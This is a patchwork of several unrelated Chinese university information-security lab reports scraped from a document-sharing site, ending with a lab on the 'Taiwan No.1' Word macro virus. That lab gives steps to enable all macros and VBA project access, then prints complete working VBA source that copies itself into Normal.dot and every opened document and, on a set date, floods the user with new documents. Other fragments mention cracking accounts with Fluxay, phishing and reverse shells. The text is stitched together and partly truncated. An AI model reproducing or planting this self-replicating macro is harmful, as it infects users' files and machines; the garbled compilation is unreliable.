信息安全技术实验报告(台湾一号)
信息安全实验报告

实验报告(201 / 201 学年第学期)课程名称信息安全技术实验名称防火墙和安全IP实验实验时间年月日指导单位指导教师实验报告实验报告实验1 安全IP实验1.安全IP的配置步骤(1)从系统控制面板出发,打开系统与安全功能,打开管理工具选项,找到本地安全策略。
(2)点开本地安全策略,找到本地电脑IP策略。
新建IP安全策略,描述中填写“IPSec 学习练习”,点击下一步,进入配(3)创建IP安全规则,点击增加,进入IP安全规则创建过程;选择“此规则不指定隧道”,即选用传输模式IPSec,选中后单击“下一步”按钮;选择“所有网络连接”,单击“下一步”按钮,进入配置IP过滤器列表阶段。
(4)IP过滤器列表配置。
点击新增按钮,新建IP过滤器列表,进行过滤器列表配置;点击新增,进行IP过滤器配置,点击下一步;描述内容“与同组主机进行安全的icmp通信”;源地址选择“我的IP地址”;目的地址选择“一个特定的IP地址”,填写另一台主机的IP地址,;选择“ICMP”协议类型,单击“下一步”按钮。
单击“完成”按钮,完成IP 过滤器配置。
(5)过滤器行为配置。
根据上图所示,选择新增的过滤器列表,点击下一步,进入过滤器行为配置阶段。
点击新增,进行过滤器行为配置。
行为命名为“安全的ICMP通信”;“筛选器操作常规选项”中选中“协商安全”,单击“下一步”按钮;选中“不与不支持IPSec的计算机通信”,单击“下一步”按钮;在“IP通信安全措施”中,选择“完整性和加密”,单击“下一步”按钮;最后单击“完成”;(6)“身份验证方法”界面。
选中“使用此字符串保护密钥交换(预共享密钥)”,填写共享密钥“lin”(主机A、主机B的共享密钥必须一致),单击“下一步”按钮,直至最终完成。
(注意:应用策略之前必须指派策略,否则策略不会自动生效。
右键点击“IP安全策略”,选择“指派assign”使策略生效。
)(7)完成IPSec配置。
2.测试结果与分析使用wireshark抓去ping的数据包的报文通常有其固定的格式:报文长度(98bytes)=以太网头(14bytes)+IP头(20bytes)+ICMP报文(64bytes)其中,以太网头(14bytes)=目的MAC(6bytes)+源MAC(6bytes)+以太网类型0800(2bytes)我们以(a)策略为例进行分析:(a)主机A不指派策略,主机B不指派策略。
信息安全实验报告(一)

1、关闭计算机的防病毒软件。
2、安装Sniffer Pro。
3、安装Superscan
4、安装Fluxay5。
5、将同一实验组的计算机设为同一网段。
6、利用Sniffer Pro观察对方的网络数据包,分析网络性能和故障。
7、用Superscan扫描对方的计算机,记录扫描的结果和发现的漏洞。
8、用Fluxay5扫描系统的漏洞并破解出另一台机器的帐号与口令
而sniffer就是一种能将本地网络接口设置成“混杂”(promiscuous)状态的软件,当网络接口处于这种"混杂"方式时,该网络接口具备广播地址,它对所有遭遇到的每一个帧都产生一个硬件中断以便提醒操作系统处理流经该物理媒体上的每一个报文包。
sniffer工作在网络环境中的底层,它会拦截所有的正在网络上传送的数据,并且通过相应的软件处理,可以实时分析这些数据的内容,进而分析所处的网络状态和整体布局。
信息安全实验报告(一)
学院:计算机科学与信息学院 专业: 网络工程 班级:网络092
姓名
王荣森
学号
0908060386
实验组
实验时间
2012.12.5
指导教师
王晓鹏
成绩
实验项目名称
实验一:常用信息安全工具的使用
实验目的
1、理解并掌握基于网络的信息安全概念和原理
2、熟悉嗅探、网络漏洞扫描等常用工具的安装、配置与使用。
(2)TCP SYN扫描
本地主机向目标主机发送SYN数据段,如果远端目标主机端口开放,则回应SYN=1,ACK=1,此时本地主机发送RST给目标主机,拒绝连接。如果远端主机端口未开放,则会回应RST给本地主机。由此可知,根据回应的数据段可以判断目标主机的端口是否开放。由于TCP SYN扫描并没有建立TCP正常连接,所以降低了被发现的可能,同时提高了扫描性能。
信息安全实验报告

信息安全实验报告
一、实验目的
本次实验是为了研究信息安全的基本概念,建立一个简单的安全模型,探讨信息安全的模型,并对其进行实验测试,了解信息安全的相关技术,
以及如何保护敏感信息。
二、实验内容
1.定义信息安全
信息安全是指保护敏感信息不被未经授权的人访问、使用或篡改的过程。
2.研究信息安全模型
信息安全模型是一个有机的概念,它包括防御、检测、响应、应急和
恢复5个基本组成部分,旨在保护敏感信息免受未经授权的访问、使用和
篡改。
3.研究信息系统安全技术
为了增强信息安全,引入了一系列安全技术来防止未经授权的访问、
使用或篡改敏感信息,这些技术包括访问控制、身份验证、数据加密和远
程登录安全。
4.建立模型实验
为了检验信息安全模型,本次实验采用Kali Linux作为实验环境,Kali Linux设有访问控制、身份验证、数据加密和远程登录安全等安全
技术,以阻止非法的访问和操纵。
三、实验结果
1.安全技术实施完毕
在实验中,实施了访问控制、身份验证、数据加密和远程登录安全等安全技术,保证了正常的服务器运行。
2.平台安全性测试
采用Metasploit框架进行安全测试。
信息安全操作实验报告

信息安全操作实验报告实验名称:信息安全操作实验实验目的:1. 掌握信息安全操作的基本知识和技能。
2. 熟悉常用的信息安全操作工具和方法。
3. 培养对信息安全的意识和保护意识。
实验步骤:1. 实验前准备:了解信息安全的基本概念和原则,并掌握常见的信息安全威胁和攻击方式。
2. 实验环境:搭建一个模拟的网络环境,包括若干主机和服务器。
3. 实验内容:3.1. 使用端口扫描工具扫描实验环境中的主机和服务器的开放端口,并记录扫描结果。
3.2. 通过漏洞扫描工具对实验环境中的主机和服务器进行漏洞扫描,并记录扫描结果。
3.3. 使用弱口令攻击工具对实验环境中的主机和服务器进行弱口令攻击,测试其安全性。
3.4. 利用网络钓鱼工具进行网络钓鱼攻击,诱导用户输入敏感信息,并分析攻击效果。
3.5. 使用反弹Shell工具在实验环境中获取目标主机的控制权,并演示如何防范此类攻击。
实验结果:1. 根据扫描结果,分析开放端口的意义和可能的安全威胁,及时进行相应的安全设置和防护措施。
2. 根据漏洞扫描结果,及时修补系统和应用程序的漏洞,以提高信息系统的安全性。
3. 验证弱口令攻击的威胁,警醒用户要设置强密码,并做好密码管理和定期更改密码的习惯。
4. 通过网络钓鱼攻击的演示,提高用户的警觉意识,防范钓鱼等社交工程攻击。
5. 演示防范反弹Shell攻击的方法,包括防火墙设置、入侵检测系统的配置和使用,提高系统的安全性。
实验结论:通过本次实验,我深刻认识到了信息安全的重要性和必要性。
信息安全操作是保护个人隐私、企业重要信息及国家安全的重要手段。
在实际工作和生活中,我们要时刻保持对信息安全的警惕,并采取相应的安全操作措施。
不仅对个人而言,企业和政府也要高度重视信息安全,加强信息安全的培训和管理,确保信息系统的安全稳定运行。
在信息安全操作中,要掌握一些基本的安全工具和方法,如端口扫描、漏洞扫描、弱口令攻击和网络钓鱼攻击等。
了解这些攻击手段和防范方法,有助于提升自身的信息安全意识和能力。
信息安全技术实验分析报告

实验报告学院:信息学院专业:信息治理与信息系统专业班级:信息13-1姓名刘斌彬学号130814102实验组实验时刻2016年指导教师蓝海洋成绩实验项目名称Windows操作系统安全,Linux操作系统安全实验目的1.掌握windows账户与密码的设置方法2.掌握文件系统的爱护和加密方法3.掌握windows操作系统安全策略与安全模板的使用,审核和日志的启用方法4.掌握windows操作系统漏洞检测软件MBSA的使用方法,建立一个windows操作系统差不多安全框架5.通过实验掌握linux操作系统(以下简称linux)环境下的用户治理,进程治理以及文件治理的相关操作命令,掌握linux中的相关安全配置方法,建立起linux的差不多安全框架实验要求通过这次的实验学习,学生要学会windows操作系统和linux操作系统的差不多差不多安全配置。
实验原理一.Windows操作系统的安全原理1.账户和密码账户和密码是登录系统的基础,同时也是众多黑客程序攻击和窃取的对象。
因此,系统账户和密码的安全是极其重要的,必须通过配置来实现账户和密码的安全。
一般用户常常在安装系统后长期使用系统的默认设置,忽视了windows 系统默认设置的不安全性,而这些不安全性常常被攻击者利用,通过各种手段获得合法的账户,进一步破解密码,从而达到非法登录系统的目的。
因此,首先需要保障账户和密码的安全。
2.文件系统磁盘数据被攻击者或本地的其他用户破坏和窃取是经常困扰用户的问题,文件系统的安装问题也是特不重要的。
Windows系统提供的磁盘格式有FAT,FAT32以及NTFS。
其中,FAT,FAT32没有考虑安全到安全性方面的更高需求,例如无法设置用户访问权限等。
NTFA文件系统是Windows操作系统的一种安全的文件系统,治理员或者用户能够设置每个文件夹及每个文件的访问权限,从而限制一些用户和用户组的访问,以保障数据安全。
3.数据加密软件EFSEFS(encrypting file system,加密文件系统)是windows2000以上的版本操作系统所特有的一个有用功能,NTFS卷上的文件和数据,都能够直接被操作系统加密和保存,在专门大程度上提高了数据的安全性。
信息安全技术实验报告

信息安全技术实验报告一.实验目的本实验旨在探究信息安全技术在网络通信中的应用,了解加密算法和数字签名的基本原理,并通过实际操作掌握其具体实现过程。
二.实验内容1.对称加密算法实验-选择一种对称加密算法,如DES或AES,了解其基本原理和加密流程。
- 使用Python编写对称加密算法的实现程序。
-在实验过程中,通过设计不同的密钥长度和明文信息,观察加密结果的变化。
2.非对称加密算法实验-选择一种非对称加密算法,如RSA,了解公钥和私钥的生成方法。
- 使用Python编写非对称加密算法的实现程序。
-在实验中,生成一对密钥,并将公钥用于加密明文,私钥用于解密密文。
观察加密和解密过程是否正确。
3.数字签名实验-了解数字签名的基本原理和应用场景。
- 使用Python编写数字签名的实现程序。
-在实验中,生成一对密钥,并使用私钥对明文进行签名,再使用公钥验证签名的正确性。
三.实验步骤及结果1.对称加密算法实验-选择了AES加密算法,其基本原理是将明文分组并通过多轮加密运算得到密文。
- 编写了Python程序实现AES加密算法,并进行了调试。
-在不同的密钥长度和明文信息下,得到了不同的加密结果。
观察到密钥长度的增加可以提高加密的安全性。
2.非对称加密算法实验-选择了RSA加密算法,其基本原理是使用两个密钥,公钥用于加密,私钥用于解密。
- 编写了Python程序实现RSA非对称加密算法,并进行了调试。
-成功生成了一对密钥,并使用公钥加密明文,私钥解密密文,观察到加密和解密结果正确。
3.数字签名实验-了解到数字签名可以保证数据的完整性和真实性。
- 编写了Python程序实现数字签名的生成和验证功能,并进行了调试。
-成功生成了一对密钥,并使用私钥对明文进行签名,再使用公钥验证签名的正确性。
四.实验总结本次实验通过对称加密算法、非对称加密算法和数字签名的实现,加深了对信息安全技术的理解和认识。
通过实际操作,掌握了加密算法和数字签名的基本原理和实现过程。
信息安全技术实验报告

信息安全技术实验报告信息安全技术实验报告1、引言在这一章节中,要介绍实验的背景和目的,并给出实验的整体概述。
2、实验设计在这一章节中,要详细说明实验的设计和方法,包括实验所使用的设备和工具,实验所涉及的软件和硬件环境,以及实验的步骤和流程。
3、实验结果在这一章节中,要展示实验的结果和数据,并进行相应的分析和解释。
需要提供实验数据的图表和说明,以支持实验结果的正确性和可靠性。
4、实验讨论在这一章节中,要对实验的结果进行详细的讨论和分析,包括实验结果与实验目的的一致性、实验中可能存在的不确定性和误差以及实验结果的意义和应用。
5、实验总结在这一章节中,要对整个实验进行总结和评价,并提出可能的改进和建议。
同时,还要对实验过程中的问题和困难进行反思和总结,以便未来的实验能够更加顺利和有效地进行。
6、附录在这一章节中,要给出实验过程中使用的代码、配置文件、数据等附件的详细说明和说明。
需要标明每个附件的名称、作用和相关信息。
本文所涉及的法律名词及注释:1、信息安全:指在计算机系统和网络中,保护信息及其基础设施不受未经授权的访问、使用、披露、破坏、修改、干扰,以确保信息的保密性、完整性和可用性的一系列措施和技术。
2、数据隐私:指个人或组织的敏感信息和个人身份信息等数据的保护,以确保不被未经授权的访问、使用、披露和存储。
3、网络攻击:指对计算机系统和网络进行非法的访问、入侵、破坏、干扰或盗取信息等行为。
4、防火墙:指一种安全设备或软件,用于过滤网络流量,防止未经授权的访问和网络攻击。
本文档涉及附件:1、实验代码:文件名为《实验代码:zip》,包含所有实验所需的代码和脚本文件。
2、实验数据:文件名为《实验数据:xlsx》,包含所有实验所的数据和结果。
3、实验配置文件:文件名为《实验配置文件:txt》,包含实验过程中使用的配置文件和参数。
信息安全技术专业大学生实习报告

信息安全技术专业大学生实习报告
尊敬的老师:
我是XXXXXXXX学院信息安全技术专业的学生,在这几个月的实习工作中,我主要负责网站编辑工作,在工作中,我学到和领悟到了很多东西,实习期间,我努力将自己在校学习的理论知识向实践方面转化,尽量做到理论和实际相结合。
在实习期间,能遵守工作纪律,不迟到,不早退,认真完成领导交给的工作。
在实习的期间里,有苦也有甜,有快乐也有不适, 一开始上班的时候,我的心情激动、兴奋、期盼、喜悦。
我相信,只有我认真学习,好好把握,做好每一件事,实习肯定会有成绩。
但后来很多东西看看简单,其实要做好它很不容易。
下面着重汇报一下我在此次实习中的具体实习内容以及我个人的实习体会。
在网络中心同事的安排下,实习期间,我共参与或个人承担了以下工作:电脑硬件组装,系统安装调试,专业网络布线、ftp 信息服务器日常维护、www 服务器日常安全检测、局部网络故障检测与排除、校内单位硬件更新等。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
课程实验报告
专业年级信息管理与信息系统xxxx 课程名称信息安全技术
指导教师x x x
学生姓名x x
学号**********xxxx
实验日期2016.11.14
实验地点实验楼304
实验成绩
教务处制
二O一六年月日
实验说明:为了保证实验的顺利进行和该实验不造成较大的破坏性,在实验开始实验之前,首先关闭杀毒软件。
其次,在进行实验感染后,被感染的终端不要打开过多的Word文档,否则清除比较麻烦。
再次,实验者在实验过后需对实验报告和终端上面的资料进行杀毒处理。
最后,实验者对实验得到的有毒文件不能在网络(公网)上面传播,以造成不必要的麻烦。
(1)打开word文档,如附图1-1:
附图1-1 word主界面
(2)打开“文件”项目,如附图1-2:
附图1-2 文件项目
(3)在文件项目中选择“选项”,进入选项窗口,如附图1-3:
附图1-3 “选项”窗口
(4)在“选项”窗口中选择自定义功能区,再选择开发工具,如附图1-4:
附图1-4 自定义功能区
(5)在自定义功能区中将开发工具打上勾,如附图1-5:
附图1-5 选择开发工具
(6)点击确定,返回到word主界面,如附图1-6:
附图1-6 word主界面
(7)在word主界面中选择开发工具,点击“宏安全性”,进入信任中心界面,如附图1-7:
附图1-7 信任中心
(8)在“信任中心”界面中选择“宏设置”按钮,如附图1-8:
附图1-8 宏设置
(9)在“宏设置”中,选择“启用所有宏”、“信任任何VBA工程对象模型的访问”,如附图1-9:
附图1-9 启用所有宏
(10)点击“确定”,返回到word主界面,如附图1-10:
附图1-10 word主界面
(11)在“开发工具”中选择“Visual Basic”或者使用快捷键Alt+F11,启用宏编辑器,如附图1-11:
附图1-11 宏编辑器
(12)选择左侧的“Project→Microsoft Word对象→ThisDocument”,如附图1-12:
附图1-12 宏代码编写
(13)在窗口中输入代码,如附图1-13:
附图1-13 代码输入
(14)将代码中“If Day ( Now ()) =14 Then”改为当前系统日期,如附图1-14:
附图1-14 日期修改
(15)点击保存、运行,如附图1-15:
附图1-15 病毒运行
(16)回答对话框内问题,如附图1-16:
附图1-16 执行询问
(17)回答问题,如果答对就跳入文档,如附图1-17:
附图1-17 运行结果
(18)如果错误,将会新建20个写有“宏病毒”字样的Word文档,再一次进行心算游戏。
总共进行三次,然后跳出程序。
关闭文档的时候也会执行同样的询问。
(19)启用任务管理器,结束任务进程。
宏病毒:就是软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成类似批处理命令的多行代码的集合。
宏病毒是寄存在文档或模板的宏中的计算机病毒,一旦打开这样的文档,宏病毒就会执行,转移到计算机上,并驻留到Normal模板中,文档一旦进行自动保存,那么就会染上这种病毒,并产生连锁性的感染。
在此次实验中,我们学习到了病毒的传染性,顽固性,一旦染上病毒,如果操作不当,病毒就会传染到整个计算机上。
在计算机使用过程中,我们应该小心再小心。
同时在实验中我们要知道怎样清除宏病毒和防御宏病毒。
清除宏病毒:
(1)杀毒软件清除宏病毒。
(2)用手工清除
1. 单击“视图”→“宏”→查看宏。
2. 单击“宏的位置”下拉条,选择“Normal.dot”,删除刚才定义的
自动宏
宏病毒的防御:
(1)宏病毒的防御方法
设置安全级别
附台湾一号源代码:
'fanjian_shiyan
Dim nm(4)
Sub Document_Open()
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If
With host
If .Lines(1, 1) <> "'fanjian_shiyan" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
If ThisDocument = NormalTemplate Then
.ReplaceLine 3, "Sub Document_Open()"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
Count = 0
If Day(Now()) = 13 Then
try:
On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm(i) = Int(Rnd() * 10)
con = con * nm(i)
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + "=?"
GoTo beg
End If
tog$ = tog$ + Str$(nm(i)) + "*"
Next i
beg:
Beep
ans$ = InputBox$("今天是" + Date$ + ",跟你玩一个心理游戏" + Chr$(13) + "你若答错,只好接受教育。
" + Chr$(13) + tog$, "台湾NO.1 Macro Virus")
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
Documents.Add
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Beep
With Selection.Font
.Name = "细明体"
.Size = 16
.Bold = 1
.Underline = 1
End With
Selection.InsertAfter Text:="何为宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="我就是。
"
Selection.InsertParagraphAfter
Selection.InsertParagraphAfter
Selection.Font.Italic = 0
Beep
Selection.InsertAfter Text:="如何防御宏病毒"
Selection.InsertParagraphAfter
Beep
Selection.InsertAfter Text:="答案:"
Selection.Font.Italic = 1
Selection.InsertAfter Text:="不要看我。
"
GoTo out
Else
Count = Count + 1
For j = 1 To 5
Beep
Documents.Add
Next j
Selection.Paragraphs.Alignment = wdAlignParagraphCenter
Selection.InsertAfter Text:="宏病毒"
If Count = 2 Then GoTo out
GoTo try
End If
Wend
End If
out:
End Sub
该病毒修改于13号发作日期为每月13号,如需修改发作日期修改源代码中If Day(Now()) = 13 Then对应的日期。